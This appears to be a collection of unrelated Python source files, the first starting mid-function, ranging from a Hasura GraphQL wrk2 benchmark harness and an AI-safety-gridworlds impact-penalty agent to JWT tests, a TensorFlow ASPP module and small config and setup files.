features.append(Feature(geometry=geometry, properties=properties,
id=uid))
return FeatureCollection(features)
def to_json_default_handler(obj):
"""Gets an attribute from the object.
Notes:
This method is confusing and the name is confusing.
Args:
obj (object): An object of some nature.
Returns:
If the object has an isoformat method (e.g. a datetime), the result of calling it is returned.
"""
if hasattr(obj, 'isoformat'):
return obj.isoformat()
def uuid(resource_type):
"""Generate a new uuid.
Notes:
First character of uuid is replaced with 'd' for resource_type dataset.
Args:
resource_type (string): A string that is a type of resource i.e. 'dataset'.
Returns:
A new uuid from the resource type.
"""
uuid = uuid4().hex
if resource_type == 'dataset':
uuid = 'd' + uuid[1:]
return uuid
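# Example: uuid('dataset') returns a 32-character hex string whose first character is 'd'.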
|
40702
|
import sys
import yahooscraper as ys
from datetime import datetime, date
from urllib.parse import urljoin
# Environment variables
USERNAME_ENV = 'YAHOO_USERNAME'
PASSWORD_ENV = '<PASSWORD>'
# Command-line args
REQUIRED_ARGS = [
'<league_id>',
'<team_id>'
]
OPTIONAL_ARGS = []
# Error messages
LOGIN_ERROR_MSG = 'Failed to log in'
def usage():
"""
Print usage and exit
"""
msg_lines = [
' '.join((
'Usage: python',
sys.argv[0],
' '.join(REQUIRED_ARGS),
' '.join(OPTIONAL_ARGS))),
'Environment variables %s and %s must also be set' % (
USERNAME_ENV,
PASSWORD_ENV)]
sys.exit('\n\n'.join(msg_lines))
def required_num_args():
min_args = len(REQUIRED_ARGS) + 1
max_args = min_args + len(OPTIONAL_ARGS)
return range(min_args, max_args + 1)
def parsed_and_bounded_arg(i, max, min, parse):
"""
Returns parsed and bounded arg from argv.
The `parse` parameter is a single-argument function which is called with
the arg. The output of this function is only returned if it is between
min and max.
If parse fails or arg is not within bounds, None is returned.
"""
if len(sys.argv) > i:
try:
parsed_arg = parse(sys.argv[i])
return parsed_arg if min <= parsed_arg <= max else None
except Exception:
return None
else:
return None
def date_from_argv(i, max, min=date.today()):
return parsed_and_bounded_arg(
i, max, min,
lambda arg: datetime.strptime(arg, '%Y-%m-%d').date())
def int_from_argv(i, max, min=1):
return parsed_and_bounded_arg(i, max, min, lambda arg: int(arg))
def output_team_info(session, league_id, team_id):
"""
Output team name and league
"""
response = session.get(ys.fantasy.team.url('nba', league_id, team_id))
league = ys.fantasy.team.league(response.text)
team = ys.fantasy.team.team(response.text)
print('%s - %s:\n' % (league, team))
|
40706
|
import FWCore.ParameterSet.Config as cms
from RecoJets.JetProducers.PFClusterJetParameters_cfi import *
from RecoJets.JetProducers.AnomalousCellParameters_cfi import *
ak4PFClusterJets = cms.EDProducer(
"FastjetJetProducer",
PFClusterJetParameters,
AnomalousCellParameters,
jetAlgorithm = cms.string("AntiKt"),
rParam = cms.double(0.4)
)
|
40753
|
VERSION = (0, 7, 0)
__version__ = ".".join(map(str, VERSION))
default_app_config = "user_messages.apps.UserMessagesConfig"
|
40754
|
from setuptools import setup
setup(
name='optool',
version='1.9.4',
py_modules=['optool'],
install_requires=[
'numpy','matplotlib'
]
)
|
40770
|
import json
import hashlib
from pydantic import BaseModel, validator
from typing import List, Optional
from speckle.base.resource import ResourceBaseSchema
from speckle.resources.objects import SpeckleObject
from speckle.schemas import Interval
NAME = 'line'
class Schema(SpeckleObject):
type: Optional[str] = "Line"
name: Optional[str] = "SpeckleLine"
Value: List[float] = []
domain: Optional[Interval] = Interval()
class Config:
case_sensitive = False
|
40779
|
import os
from oic.utils.jwt import JWT
from oic.utils.keyio import build_keyjar
from oic.utils.keyio import keybundle_from_local_file
__author__ = "roland"
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "data/keys"))
keys = [
{"type": "RSA", "key": os.path.join(BASE_PATH, "cert.key"), "use": ["enc", "sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["enc"]},
]
jwks, keyjar, kidd = build_keyjar(keys)
issuer = "https://fedop.example.org"
def _eq(l1, l2):
return set(l1) == set(l2)
def test_jwt_pack():
_jwt = JWT(keyjar, lifetime=3600, iss=issuer).pack()
assert _jwt
assert len(_jwt.split(".")) == 3
def test_jwt_pack_and_unpack():
srv = JWT(keyjar, iss=issuer)
_jwt = srv.pack(sub="sub")
info = srv.unpack(_jwt)
assert _eq(info.keys(), ["jti", "iat", "exp", "iss", "sub", "kid"])
class TestJWT(object):
"""Tests for JWT."""
def test_unpack_verify_key(self):
srv = JWT(keyjar, iss=issuer)
_jwt = srv.pack(sub="sub")
# Remove the signing key from keyjar
keyjar.remove_key("", "RSA", "")
# And add it back as verify
kb = keybundle_from_local_file(
os.path.join(BASE_PATH, "cert.key"), "RSA", ["ver"]
)
# keybundle_from_local_file doesn't assign kid, so assign manually
kb._keys[0].kid = kidd["sig"]["RSA"]
keyjar.add_kb("", kb)
info = srv.unpack(_jwt)
assert info["sub"] == "sub"
|
40808
|
from ai_safety_gridworlds.environments.shared import safety_game
from collections import defaultdict
import experiments.environment_helper as environment_helper
import numpy as np
class ModelFreeAUPAgent:
name = "Model-free AUP"
pen_epsilon, AUP_epsilon = .2, .9 # chance of choosing greedy action in training
default = {'lambd': 1./1.501, 'discount': .996, 'rpenalties': 30, 'episodes': 6000}
def __init__(self, env, lambd=default['lambd'], state_attainable=False, num_rewards=default['rpenalties'],
discount=default['discount'], episodes=default['episodes'], trials=50, use_scale=False):
"""Trains using the simulator and e-greedy exploration to determine a greedy policy.
:param env: Simulator.
:param lambd: Impact tuning parameter.
:param state_attainable: True - generate state indicator rewards; false - random rewards.
:param num_rewards: Size of the attainable set, |\mathcal{R}|.
:param discount:
:param episodes:
:param trials:
"""
self.actions = range(env.action_spec().maximum + 1)
self.probs = [[1.0 / (len(self.actions) - 1) if i != k else 0 for i in self.actions] for k in self.actions]
self.discount = discount
self.episodes = episodes
self.trials = trials
self.lambd = lambd
self.state_attainable = state_attainable
self.use_scale = use_scale
if state_attainable:
self.name = 'Relative reachability'
self.attainable_set = environment_helper.derive_possible_rewards(env)
else:
self.attainable_set = [defaultdict(np.random.random) for _ in range(num_rewards)]
if len(self.attainable_set) == 0:
self.name = 'Standard' # no penalty applied!
self.train(env)
def train(self, env):
self.performance = np.zeros((self.trials, self.episodes // 10))
# 0: high-impact, incomplete; 1: high-impact, complete; 2: low-impact, incomplete; 3: low-impact, complete
self.counts = np.zeros(4)
for trial in range(self.trials):
self.attainable_Q = defaultdict(lambda: np.zeros((len(self.attainable_set), len(self.actions))))
self.AUP_Q = defaultdict(lambda: np.zeros(len(self.actions)))
if not self.state_attainable:
self.attainable_set = [defaultdict(np.random.random) for _ in range(len(self.attainable_set))]
self.epsilon = self.pen_epsilon
for episode in range(self.episodes):
if episode > 2.0 / 3 * self.episodes: # begin greedy exploration
self.epsilon = self.AUP_epsilon
time_step = env.reset()
while not time_step.last():
last_board = str(time_step.observation['board'])
action = self.behavior_action(last_board)
time_step = env.step(action)
self.update_greedy(last_board, action, time_step)
if episode % 10 == 0:
_, actions, self.performance[trial][episode // 10], _ = environment_helper.run_episode(self, env)
self.counts[int(self.performance[trial, -1]) + 2] += 1 # -2 goes to idx 0
env.reset()
def act(self, obs):
return self.AUP_Q[str(obs['board'])].argmax()
def behavior_action(self, board):
"""Returns the e-greedy action for the state board string."""
greedy = self.AUP_Q[board].argmax()
if np.random.random() < self.epsilon or len(self.actions) == 1:
return greedy
else: # choose anything else
return np.random.choice(self.actions, p=self.probs[greedy])
def get_penalty(self, board, action):
if len(self.attainable_set) == 0: return 0
action_attainable = self.attainable_Q[board][:, action]
null_attainable = self.attainable_Q[board][:, safety_game.Actions.NOTHING]
diff = action_attainable - null_attainable
# Scaling number or vector (per-AU)
if self.use_scale:
scale = sum(abs(null_attainable))
if scale == 0:
scale = 1
penalty = sum(abs(diff) / scale)
else:
scale = np.copy(null_attainable)
scale[scale == 0] = 1 # avoid division by zero
penalty = np.average(np.divide(abs(diff), scale))
# Scaled difference between taking action and doing nothing
return self.lambd * penalty # ImpactUnit is 0!
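# Worked example (illustrative numbers, per-AU scaling branch): with null_attainable = [2, 4]
# and action_attainable = [1, 5], diff = [-1, 1], |diff|/scale = [0.5, 0.25],
# so penalty = mean([0.5, 0.25]) = 0.375 and the returned value is lambd * 0.375.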
def update_greedy(self, last_board, action, time_step):
"""Perform TD update on observed reward."""
learning_rate = 1
new_board = str(time_step.observation['board'])
def calculate_update(attainable_idx=None):
"""Do the update for the main function (or the attainable function at the given index)."""
if attainable_idx is not None:
reward = self.attainable_set[attainable_idx](new_board) if self.state_attainable \
else self.attainable_set[attainable_idx][new_board]
new_Q, old_Q = self.attainable_Q[new_board][attainable_idx].max(), \
self.attainable_Q[last_board][attainable_idx, action]
else:
reward = time_step.reward - self.get_penalty(last_board, action)
new_Q, old_Q = self.AUP_Q[new_board].max(), self.AUP_Q[last_board][action]
return learning_rate * (reward + self.discount * new_Q - old_Q)
# Learn the attainable reward functions
for attainable_idx in range(len(self.attainable_set)):
self.attainable_Q[last_board][attainable_idx, action] += calculate_update(attainable_idx)
if self.state_attainable:
self.attainable_Q[last_board][:, action] = np.clip(self.attainable_Q[last_board][:, action], 0, 1)
self.AUP_Q[last_board][action] += calculate_update()
|
40809
|
import tensorflow as tf
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Conv2D, BatchNormalization, ReLU, GlobalAveragePooling2D, Dropout
class ASPP(Model):
def __init__(self, filters, dilation_rates=[3, 6, 9]):
super().__init__()
self.aspp1 = ASPPConv(filters, 1, 1)
self.aspp2 = ASPPConv(filters, 3, dilation_rates[0])
self.aspp3 = ASPPConv(filters, 3, dilation_rates[1])
self.aspp4 = ASPPConv(filters, 3, dilation_rates[2])
self.pool = ASPPPooling(filters)
self.project = Sequential([
Conv2D(filters, 1, use_bias=False),
BatchNormalization(momentum=0.1, epsilon=1e-5),
ReLU(),
Dropout(0.1)
])
def call(self, x, training=None):
x = tf.concat([
self.aspp1(x, training=training),
self.aspp2(x, training=training),
self.aspp3(x, training=training),
self.aspp4(x, training=training),
self.pool(x, training=training)
], axis=-1)
x = self.project(x, training=training)
return x
class ASPPConv(Model):
def __init__(self, filters, kernel_size, dilation_rate):
super().__init__()
self.conv = Conv2D(filters, kernel_size, padding='SAME', dilation_rate=dilation_rate, use_bias=False)
self.bn = BatchNormalization(momentum=0.1, epsilon=1e-5)
self.relu = ReLU()
def call(self, x, training=None):
x = self.conv(x, training=training)
x = self.bn(x, training=training)
x = self.relu(x, training=training)
return x
class ASPPPooling(Model):
def __init__(self, filters):
super().__init__()
self.pool = GlobalAveragePooling2D()
self.conv = Conv2D(filters, 1, use_bias=False)
self.bn = BatchNormalization(momentum=0.1, epsilon=1e-5)
self.relu = ReLU()
def call(self, x, training=None):
h, w = tf.shape(x)[1], tf.shape(x)[2]
x = self.pool(x, training=training)
x = x[:, None, None, :]
x = self.conv(x, training=training)
x = self.bn(x, training=training)
x = self.relu(x, training=training)
x = tf.image.resize(x, (h, w), 'nearest')
return x
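# Minimal usage sketch (illustrative shapes, not from the original source):
#   aspp = ASPP(filters=256)
#   y = aspp(tf.random.normal((1, 65, 65, 2048)), training=False)
#   # five 256-channel branches are concatenated (1280 channels) and projected back to 256,
#   # so y has shape (1, 65, 65, 256)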
|
40812
|
from sportsdb_setup import HGETestSetup, HGETestSetupArgs
from run_hge import HGE
import graphql
import multiprocessing
import json
import os
import docker
import ruamel.yaml as yaml
import cpuinfo
import subprocess
import threading
import time
import datetime
from colorama import Fore, Style
from plot import run_dash_server
import webbrowser
import pathlib
from urllib.parse import urlparse, urlunparse
import boto3
fileLoc = os.path.dirname(os.path.abspath(__file__))
def uri_path_join(uri, *paths):
p = urlparse(uri)
new_path = os.path.join(p.path, *paths)
return urlunparse(p._replace(path=new_path))
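# Example: uri_path_join('s3://bucket/base', 'runs', 'latencies') -> 's3://bucket/base/runs/latencies'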
class HGEWrkBench(HGETestSetup):
wrk_docker_image = 'hasura/wrk:v0.3'
# We'll bind mount the lua script dir to this directory within the wrk container:
lua_dir = '/tmp/bench_scripts'
rps_steps = [10, 20, 50, 100, 200, 500, 1000, 2000, 5000]
def __init__(
self, pg_url, remote_pg_url, pg_docker_image, hge_url=None,
remote_hge_url=None, hge_docker_image=None,
hge_args=[], skip_stack_build=False,
graphql_queries_file='queries.graphql', connections=50,
duration=300, results_hge_url = None, results_hge_admin_secret = None
):
self.load_queries(graphql_queries_file)
super().__init__(
pg_url = pg_url,
remote_pg_url = remote_pg_url,
pg_docker_image = pg_docker_image,
hge_url = hge_url,
remote_hge_url = remote_hge_url,
hge_docker_image = hge_docker_image,
hge_args = hge_args,
skip_stack_build = skip_stack_build
)
self.connections = connections
self.duration = duration
self.results_hge_url = results_hge_url
self.results_hge_admin_secret = results_hge_admin_secret
self.extract_cpu_info()
# NOTE: we generally want to do this just once; otherwise if we happen
# to be editing the tree while this script is running the shasum will
# keep changing:
self.server_shasum = self.get_server_shasum()
def load_queries(self, graphql_queries_file):
self.graphql_queries_file = graphql_queries_file
with open(self.graphql_queries_file) as f:
queries = f.read()
self.query_names = []
self.queries = []
for oper in graphql.parse(queries).definitions:
self.query_names.append(oper.name.value)
self.queries.append(oper)
def get_wrk2_params(self):
cpu_count = multiprocessing.cpu_count()
return {
'threads': cpu_count,
'connections': self.connections,
'duration': self.duration
}
def get_current_user(self):
return '{}:{}'.format(os.geteuid(), os.getegid())
def wrk2_test(self, query, rps):
def upload_files(files):
if self.upload_root_uri:
p = urlparse(self.upload_root_uri)
if p.scheme == 's3':
bucket = p.netloc
key = p.path.lstrip('/')
s3_client = boto3.client('s3')
for (f, f_key) in files:
s3_client.upload_file(f, bucket, os.path.join(key, f_key))
query_str = graphql.print_ast(query)
params = self.get_wrk2_params()
print(Fore.GREEN + "Running benchmark wrk2 for at {} req/s (duration: {}) for query\n".format(rps, params['duration']), query_str + Style.RESET_ALL)
bench_script = os.path.join(self.lua_dir, 'bench-wrk2.lua')
graphql_url = self.hge.url + '/v1/graphql'
timestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
results_dir = self.results_root_dir
tests_path = [str(rps), timestamp]
results_dir = os.path.join(results_dir, *tests_path)
os.makedirs(results_dir, exist_ok=True)
wrk2_command = [
'wrk2',
'-R', str(rps),
'-t', str(params['threads']),
'-c', str(params['connections']),
'-d', str(params['duration']),
'--latency',
'-s', bench_script,
graphql_url,
query_str,
results_dir
]
volumes = self.get_scripts_vol()
volumes[results_dir] = {
'bind': results_dir,
'mode': 'rw'
}
self.docker_client = docker.from_env()
result = self.docker_client.containers.run(
self.wrk_docker_image,
detach = False,
stdout = True,
stderr = False,
command = wrk2_command,
network_mode = 'host',
environment = self.get_lua_env(),
volumes = volumes,
remove = True,
user = self.get_current_user()
).decode('ascii')
histogram_file = os.path.join(results_dir, 'latencies.hgrm')
histogram = self.get_latency_histogram(result, histogram_file)
summary_file = os.path.join(results_dir, 'summary.json')
with open(summary_file) as f:
summary = json.load(f)
latencies_file = os.path.join(results_dir, 'latencies')
def extract_data(v):
return v['data'] if isinstance(v, dict) and 'data' in v else v
tests_info = { k:extract_data(v) for (k, v) in self.gen_test_info(query, rps).items() }
tests_setup_file = os.path.join(results_dir, 'test_setup.json')
with open(tests_setup_file, 'w') as f:
f.write(json.dumps(tests_info, indent=2))
upload_files([
(x, os.path.join(*tests_path,y))
for (x,y) in [
(summary_file, 'summary.json'),
(latencies_file, 'latencies'),
(histogram_file, 'latencies.hgrm'),
(tests_setup_file, 'test_setup.json')
]
])
if self.upload_root_uri:
latencies_uri = uri_path_join(self.upload_root_uri, *tests_path, 'latencies')
else:
latencies_uri = pathlib.Path(latencies_file).as_uri()
self.insert_result(query, rps, summary, histogram, latencies_uri)
return (summary, histogram)
def get_latency_histogram(self, result, write_histogram_file):
const_true = lambda l : True
state_changes = {
'start' : {
(lambda l: 'Detailed Percentile spectrum' in l) : 'histogram_start'
},
'histogram_start': {
(lambda l: 'Value' in l and 'Percentile' in l): 'histogram_headers'
},
'histogram_headers': {
const_true: 'histogram_empty_line'
},
'histogram_empty_line' : {
const_true: 'histogram_values'
},
'histogram_values': {
(lambda l: l.strip().startswith('#')): 'histogram_summary'
},
'histogram_summary': {
(lambda l: not l.strip().startswith('#')): 'histogram_end'
}
}
state = 'start'
histogram = []
print(Fore.CYAN + "Latency histogram summary" + Style.RESET_ALL)
with open(write_histogram_file, 'w') as f:
for line in result.splitlines():
# Change the state
for (check, next_state) in state_changes[state].items():
if check(line):
state = next_state
break
if state == 'start':
continue
elif state == 'histogram_end':
break
if state == 'histogram_summary':
print(Fore.CYAN + line + Style.RESET_ALL)
if state in ['histogram_headers','histogram_values','histogram_summary']:
f.write(line+'\n')
if state == 'histogram_values':
(val, percentile, total_count, _) = line.strip().split()
histogram.append({
'percentile': float(percentile),
'latency': float(val),
'total_count': float(total_count)
})
return histogram
# The appropriate Lua env vars for execution within wrk container:
def get_lua_env(self):
return {
'LUA_PATH': '/usr/share/lua/5.1/?.lua;' +
os.path.join(self.lua_dir, '?.lua') + ';;',
'LUA_CPATH': '/usr/lib/lua/5.1/?.so;/usr/lib/x86_64-linux-gnu/lua/5.1/?.so;;'
}
def get_scripts_vol(self):
return {
os.path.join(fileLoc, 'wrk-websocket-server', 'bench_scripts'): {
'bind' : self.lua_dir,
'mode' : 'ro'
}
}
def max_rps_test(self, query):
query_str = graphql.print_ast(query)
print(Fore.GREEN + "(Compute maximum Request per second) Running wrk benchmark for query\n", query_str + Style.RESET_ALL)
self.hge.graphql_q(query_str) # Test query once for errors
bench_script = os.path.join(self.lua_dir, 'bench-wrk.lua')
graphql_url = self.hge.url + '/v1/graphql'
params = self.get_wrk2_params()
duration = 30
wrk_command = [
'wrk',
'-t', str(params['threads']),
'-c', str(params['connections']),
'-d', str(duration),
'--latency',
'-s', bench_script,
graphql_url,
query_str
]
self.docker_client = docker.from_env()
result = self.docker_client.containers.run(
self.wrk_docker_image,
detach = False,
stdout = False,
stderr = True,
command = wrk_command,
network_mode = 'host',
environment = self.get_lua_env(),
volumes = self.get_scripts_vol(),
remove = True,
user = self.get_current_user()
)
summary = json.loads(result)['summary']
# TODO explain this calculation. Why aren't we using wrk's reported 'max'? Should we call this avg_sustained_rps or something?
max_rps = round(summary['requests']/float(duration))
self.insert_max_rps_result(query, max_rps)
print("Max RPS", max_rps)
return max_rps
def get_version(self):
script = os.path.join(fileLoc, 'gen-version.sh')
return subprocess.check_output([script]).decode('ascii').strip()
def get_server_shasum(self):
script = os.path.join(fileLoc, 'get-server-sha.sh')
return subprocess.check_output([script]).decode('ascii').strip()
def extract_cpu_info(self):
self.cpu_info = cpuinfo.get_cpu_info()
for k in ['flags', 'python_version', 'hz_actual', 'hz_actual_raw']:
if self.cpu_info.get(k):
del self.cpu_info[k]
def get_results(self):
query = '''
query results {
latency: hge_bench_latest_results {
query_name
requests_per_sec
docker_image
version
latencies_uri
latency_histogram {
percentile
latency
}
}
max_rps: hge_bench_avg_query_max_rps {
query_name
docker_image
version
max_rps
}
}
'''
output = self.results_hge.graphql_q(query)
return output['data']
def set_cpu_info(self, insert_var):
cpu_key = self.cpu_info['brand'] + ' vCPUs: ' + str(self.cpu_info['count'])
insert_var['cpu']= {
'data' : {
'info': self.cpu_info,
'key': cpu_key
},
"on_conflict": {
"constraint": "cpu_info_pkey",
"update_columns": "key"
}
}
def set_query_info(self, insert_var, query):
insert_var["query"] = {
"data": {
"name" : query.name.value,
"query" : graphql.print_ast(query)
},
"on_conflict" : {
"constraint": "gql_query_query_key",
"update_columns": "query"
}
}
#TODO add executable shasum also
def set_version_info(self, insert_var):
if self.hge_docker_image:
insert_var["docker_image"] = self.hge_docker_image
else:
insert_var["version"] = self.get_version()
insert_var["server_shasum"] = self.server_shasum
insert_var['postgres_version'] = self.pg.get_server_version()
if self.scenario_name:
insert_var['scenario_name'] = self.scenario_name
def set_hge_args_env_vars(self, insert_var):
to_hide_env = ['HASURA_GRAPHQL_' + env for env in
[ 'ADMIN_SECRET', 'DATABASE_URL', 'JWT_SECRET']
]
env = { k:v for (k,v) in self.hge.get_hge_env().items() if (k.startswith('HASURA_GRAPHQL') and k not in to_hide_env) or k in ['GHCRTS'] }
args = self.hge.args
insert_var['hge_conf'] = {
'env': env,
'args': args
}
def gen_max_rps_insert_var(self, query, max_rps):
insert_var = dict()
self.set_cpu_info(insert_var)
self.set_query_info(insert_var, query)
self.set_version_info(insert_var)
self.set_hge_args_env_vars(insert_var)
insert_var['max_rps'] = max_rps
insert_var['wrk_parameters'] = self.get_wrk2_params()
return insert_var
def plot_results(self):
def open_plot_in_browser():
time.sleep(1)
webbrowser.open_new_tab('http://127.0.0.1:8050/')
threading.Thread(target=open_plot_in_browser).start()
run_dash_server(self.get_results())
# Collect info about the test environment
def gen_test_info(self, query, rps):
test_info = dict()
self.set_cpu_info(test_info)
self.set_query_info(test_info, query)
self.set_version_info(test_info)
self.set_hge_args_env_vars(test_info)
test_info["requests_per_sec"] = rps
test_info['wrk2_parameters'] = self.get_wrk2_params()
return test_info
def gen_result_insert_var(self, query, rps, summary, latency_histogram, latencies_uri):
insert_var = self.gen_test_info(query, rps)
insert_var["summary"] = summary
insert_var['latency_histogram'] = {
'data' : latency_histogram
}
insert_var['latencies_uri'] = latencies_uri
return insert_var
def insert_result(self, query, rps, summary, latency_histogram, latencies_uri):
result_var = self.gen_result_insert_var(query, rps, summary, latency_histogram, latencies_uri)
insert_query = """
mutation insertResult($result: hge_bench_results_insert_input!) {
insert_hge_bench_results(objects: [$result]){
affected_rows
}
}"""
variables = {'result': result_var}
self.results_hge.graphql_q(insert_query, variables)
def insert_max_rps_result(self, query, max_rps):
result_var = self.gen_max_rps_insert_var(query, max_rps)
insert_query = """
mutation insertMaxRps($result: hge_bench_query_max_rps_insert_input!) {
insert_hge_bench_query_max_rps(objects: [$result]){
affected_rows
}
}"""
variables = {'result': result_var}
self.results_hge.graphql_q(insert_query, variables)
def setup_results_schema(self):
if not self.results_hge_url:
self.results_hge_url = self.hge.url
self.results_hge_admin_secret = self.hge.admin_secret()
if self.results_hge_admin_secret:
results_hge_args = ['--admin-secret', self.results_hge_admin_secret]
else:
results_hge_args = []
self.results_hge = HGE(None, None, args=results_hge_args, log_file=None, url=self.results_hge_url)
results_table = {
'name' : 'results',
'schema': 'hge_bench'
}
if results_table in self.results_hge.get_all_tracked_tables():
return
schema_file = os.path.join(fileLoc, 'results_schema.yaml')
with open(schema_file) as f:
queries = yaml.safe_load(f)
self.results_hge.run_bulk(queries)
def run_query_benchmarks(self):
def get_results_root_dir(query):
if self.hge_docker_image:
ver_info = 'docker-tag-' + self.hge_docker_image.split(':')[1]
else:
ver_info = self.get_version()
query_name = query.name.value
# Store versioned runs under e.g. test_output/benchmark_runs/<hge_version>/
results_root_dir = os.path.abspath(os.path.join(self.work_dir, 'benchmark_runs'))
return os.path.join(results_root_dir, ver_info, query_name)
for query in self.queries:
try:
self.results_root_dir = get_results_root_dir(query)
max_rps = self.max_rps_test(query)
# The tests should definitely not be running very close to or higher than maximum requests per second
rps_steps = [ r for r in self.rps_steps if r < 0.6*max_rps]
print("Benchmarking queries with wrk2 for the following requests/sec", rps_steps)
for rps in rps_steps:
if rps < int(0.6*max_rps):
self.wrk2_test(query, rps)
except Exception:
print(Fore.RED + "Benchmarking Graphql Query '" + query.name.value + "' failed" + Style.RESET_ALL)
raise
def run_tests(self):
with self.graphql_engines_setup():
self.setup_results_schema()
if self.run_benchmarks:
self.run_query_benchmarks()
if not self.skip_plots:
self.plot_results()
class HGEWrkBenchArgs(HGETestSetupArgs):
def __init__(self):
self.set_arg_parse_options()
self.parse_args()
def set_arg_parse_options(self):
HGETestSetupArgs.set_arg_parse_options(self)
self.set_wrk_options()
def parse_args(self):
HGETestSetupArgs.parse_args(self)
self.parse_wrk_options()
def set_wrk_options(self):
def boolean_string(s):
s = s.lower()
if s not in {'false', 'true'}:
raise ValueError('Not a valid boolean string')
return s == 'true'
wrk_opts = self.arg_parser.add_argument_group('wrk')
wrk_opts.add_argument('--queries-file', metavar='HASURA_BENCH_QUERIES_FILE', help='Queries file for benchmarks', default='queries.graphql')
wrk_opts.add_argument('--connections', metavar='HASURA_BENCH_CONNECTIONS', help='Total number of open connections', default=50)
wrk_opts.add_argument('--duration', metavar='HASURA_BENCH_DURATION', help='Duration of tests in seconds', default=300)
wrk_opts.add_argument('--upload-root-uri', metavar='HASURA_BENCH_UPLOAD_ROOT_URI', help='The URI to which the latency results should be uploaded. Currently only s3 is supported', required=False)
wrk_opts.add_argument('--set-scenario-name', metavar='HASURA_BENCH_SCENARIO_NAME', help='Set a name for the test scenario. This will be shown in logs', required=False)
wrk_opts.add_argument('--results-hge-url', metavar='HASURA_BENCH_RESULTS_HGE_URL', help='The GraphQL engine to which the results should be uploaded', required=False)
wrk_opts.add_argument('--results-hge-admin-secret', metavar='HASURA_BENCH_RESULTS_HGE_ADMIN_SECRET', help='Admin secret of the GraphQL engine to which the results should be uploaded', required=False)
wrk_opts.add_argument('--skip-plots', help='Skip plotting', action='store_true', required=False)
wrk_opts.add_argument('--run-benchmarks', metavar='HASURA_BENCH_RUN_BENCHMARKS', help='Whether benchmarks should be run or not', default=True, type=boolean_string)
def get_s3_caller_identity(self):
return boto3.client('sts').get_caller_identity()
def parse_wrk_options(self):
self.connections, self.duration, self.graphql_queries_file, self.res_hge_url, upload_root_uri, self.res_hge_admin_secret, self.run_benchmarks, self.scenario_name = \
self.get_params([
('connections', 'HASURA_BENCH_CONNECTIONS'),
('duration', 'HASURA_BENCH_DURATION'),
('queries_file', 'HASURA_BENCH_QUERIES_FILE'),
('results_hge_url', 'HASURA_BENCH_RESULTS_HGE_URL'),
('upload_root_uri', 'HASURA_BENCH_UPLOAD_ROOT_URI'),
('results_hge_admin_secret', 'HASURA_BENCH_RESULTS_HGE_ADMIN_SECRET'),
('run_benchmarks', 'HASURA_BENCH_RUN_BENCHMARKS'),
('set_scenario_name', 'HASURA_BENCH_SCENARIO_NAME'),
])
self.upload_root_uri = None
if upload_root_uri:
p = urlparse(upload_root_uri)
if p.scheme == 's3':
# Check if aws credentials are set
self.get_s3_caller_identity()
self.upload_root_uri = upload_root_uri
self.skip_plots = self.parsed_args.skip_plots
class HGEWrkBenchWithArgs(HGEWrkBenchArgs, HGEWrkBench):
def __init__(self):
HGEWrkBenchArgs.__init__(self)
HGEWrkBench.__init__(
self,
pg_url = self.pg_url,
remote_pg_url = self.remote_pg_url,
pg_docker_image = self.pg_docker_image,
hge_url = self.hge_url,
remote_hge_url = self.remote_hge_url,
hge_docker_image = self.hge_docker_image,
hge_args = self.hge_args,
skip_stack_build = self.skip_stack_build,
graphql_queries_file = self.graphql_queries_file,
connections = self.connections,
duration = self.duration
)
if __name__ == "__main__":
bench = HGEWrkBenchWithArgs()
bench.run_tests()
|
40828
|
import pytest
from backend.common.models.team import Team
from backend.common.models.tests.util import (
CITY_STATE_COUNTRY_PARAMETERS,
LOCATION_PARAMETERS,
)
@pytest.mark.parametrize("key", ["frc177", "frc1"])
def test_valid_key_names(key: str) -> None:
assert Team.validate_key_name(key) is True
@pytest.mark.parametrize("key", ["bcr077", "frc 011", "frc711\\"])
def test_invalid_key_names(key: str) -> None:
assert Team.validate_key_name(key) is False
def test_key_name() -> None:
team = Team(id="frc254", team_number=254)
assert team.key_name == "frc254"
@pytest.mark.parametrize(LOCATION_PARAMETERS[0], LOCATION_PARAMETERS[1])
def test_location(
city: str, state: str, country: str, postalcode: str, output: str
) -> None:
team = Team(
city=city,
state_prov=state,
country=country,
postalcode=postalcode,
)
assert team.location == output
@pytest.mark.parametrize(
CITY_STATE_COUNTRY_PARAMETERS[0], CITY_STATE_COUNTRY_PARAMETERS[1]
)
def test_city_state_country(city: str, state: str, country: str, output: str) -> None:
team = Team(
city=city,
state_prov=state,
country=country,
)
assert team.city_state_country == output
def test_details_url() -> None:
team = Team(
id="frc254",
team_number=254,
)
assert team.details_url == "/team/254"
|